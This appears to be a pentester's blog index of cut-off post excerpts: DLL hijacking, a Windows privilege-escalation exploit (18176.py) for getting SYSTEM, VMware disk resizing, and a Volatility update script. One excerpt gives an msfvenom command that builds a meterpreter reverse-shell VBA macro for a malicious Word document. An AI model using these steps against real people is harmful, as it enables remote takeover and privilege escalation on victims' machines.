So it’s been spoken of alot but i’d never actually got around to trying it. A colleague has been banging on about it for weeks and before he got chance to play with it a second colleague managed to use this in the wild. Sweet! I decided it would be worth playing with in order to have a go at creating my own DLL and seeing what is vulnerable on… Continue reading

So you’ve got access to a box but it’s only as a local user and you want SYSTEM like most people, step in 18176.py. As this code was written in python you’ll need a local copy of python on the box in order to priv up.

1234567C:\Documents and Settings\user\Desktop>18176.py Usage: 18176.py -O TARGET_OS Options:   -h, --help            show this help message and exit  … Continue reading

So you’ve got a VMWare system but when you created it you did so but specified the wrong disk type. For example I have a Win7 32bit VM specifically for iTunes (in my family we have iPhones and iPads). Unfortunately when I created this for some silly reason decided to set the 40GB drive to preallocated meaning I have a single 40GB file taking up far too much room on… Continue reading

So you want/need a malicious word document in order to own a target, step in metasploit.

The first thing you’ll need to do is create the code that you’ll copy&paste into your word document.

1./msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=4444 -f vba > vbcode.txt

The output will contain 2 blocks of code; the macro and the data.

Open a new word document and Press Alt+F11 in order to open “Microsoft Visual… Continue reading

So for those that dont know volatility is a forensics tool for investigating data from memory. It can be found here: http://www.volatilesystems.com/default/volatility

Unfortunately BT5 was only on version 1.3 so I decided to update it to v2.0, the latest on the volatility website.

Here’s the quick code to update to version 2.0 🙂 Enjoy!

1234567891011121314151617181920#!/bin/bash apt-get -y install cmake cd /root/ wget http://freddie.witherden.org/tools/libforensic1394/releases/libforensic1394-0.2.tar.gz tar zxvf libforensic1394-0.2.tar.gz cd libforensic1394-0.2/ cmake -G"Unix… Continue reading